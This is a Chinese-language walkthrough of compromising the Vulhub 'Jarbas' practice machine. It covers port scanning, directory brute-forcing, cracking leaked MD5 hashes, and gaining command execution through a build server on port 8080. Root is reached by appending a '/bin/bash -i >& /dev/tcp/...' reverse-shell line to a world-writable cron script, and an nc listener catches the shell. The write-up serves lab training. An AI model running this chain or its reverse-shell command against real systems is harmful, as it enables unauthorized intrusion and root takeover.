vulhub:Jarbas

vulhub:Jarbas

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
kali@kali [~/web_shell_toos] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.41.138                       [0:41:13]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-20 00:41 CST
Nmap scan report for 192.168.41.138
Host is up (0.0010s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:A5:68:07 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.10 seconds

深度扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
kali@kali [~] ➜  sudo nmap -sT -sV -sC -p22,80,3306,8080 -O 192.168.41.138                                [23:41:39]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 23:42 CST
Nmap scan report for 192.168.41.138
Host is up (0.00043s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|   256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_  256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Jarbas - O Seu Mordomo Virtual!
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
| http-methods: 
|_  Potentially risky methods: TRACE
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 00:0C:29:A5:68:07 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.58 seconds

80端口渗透

1

看了一下,没发现啥东西,先进行目录爆破吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
kali@kali [~] ➜  sudo dirsearch -u http://192.168.41.138                                               [0:40:29]
[sudo] kali 的密码:
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.41.138/_25-02-20_00-45-10.txt

Target: http://192.168.41.138/

[00:45:19] 200 -  359B  - /access.html

Task Completed

访问/access.html,拿到了几个账号和密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
kali@kali [~] ➜  curl http://192.168.41.138/access.html                                                [0:46:14]
<html>
<title>New Agile version!</title>
<body>
<h2>
<p align=center> Creds encrypted in a safe way!</h2></p>
<p align=center> <img src="geoffrey.jpg" alt="Geoffrey"></p>
<p align=center> tiago:5978a63b4654c73c60fa24f836386d87<br>
trindade:f463f63616cb3f1e81ce46b39f882fd5<br>
eder:9b38e2b1e8b12f426b0d208a7ab6cb98<br>
</p>
</p> 
</body>
</html>

看起来就是md5加密,放在john里面破解吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
                                 [0:51:45]
kali@kali [~] ➜  john --format=Raw-MD5 x

Using default input encoding: UTF-8
Loaded 3 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 9 candidates buffered for the current salt, minimum 24 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
marianna         (trindade)     
vipsu            (eder)     
italia99         (tiago)     
3g 0:00:02:21 DONE 3/3 (2025-02-20 00:54) 0.02114g/s 35986Kp/s 35986Kc/s 37262KC/s italia03..italien7
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

密码破解之后,因为开放ssh和3306端口,所以我就直接进行爆破,但是hydra破解未果,只能寻找是否有其它登录入口,最终发现8080的登录入口

2

登录之后,我们构建一个项目,发现可以进行命令执行,我们直接进行反弹shell

3

启动监听,然后点击立即构建,这样命令便执行了,拿到shell

提权

4

我们拿到的这个shell,权限很低的,很多命令无法执行,像ip addr,wget去下载文件也不行,只能手动枚举找一些突破口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
bash-4.2$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
bash-4.2$ cat /etc/cortab    
cat /etc/cortab
cat: /etc/cortab: No such file or directory
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$

我们发现了一个bash脚本,详细查看一下

1
2
3
4
5
6
7
8
9
10
11
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
bash-4.2$ ls -la /etc/script 
ls -la /etc/script
total 16
drwxr-xr-x.  2 root root   31 Apr  1  2018 .
drwxr-xr-x. 83 root root 8192 Feb 19 13:15 ..
-rwxrwxrwx.  1 root root   50 Apr  1  2018 CleaningScript.sh

这个脚本不重要,重要的是我们有可以写入的权限,而且这个计划任务是以root身份执行的,那我们直接写入反弹shell即可

1
2
3
4
5
6
7
8
bash-4.2$ echo "/bin/bash -i >& /dev/tcp/192.168.41.133/4444 0>&1" >> /etc/script/CleaningScript.sh
<i >& /dev/tcp/192.168.41.133/4444 0>&1" >> /etc/script/CleaningScript.sh    
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
/bin/bash -i >& /dev/tcp/192.168.41.133/4444 0>&1
1
2
3
4
5
6
7
kali@kali [~] ➜  nc -lvnp 4444                                                                                                                    [1:04:21]
listening on [any] 4444 ...
connect to [192.168.41.133] from (UNKNOWN) [192.168.41.138] 47144
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root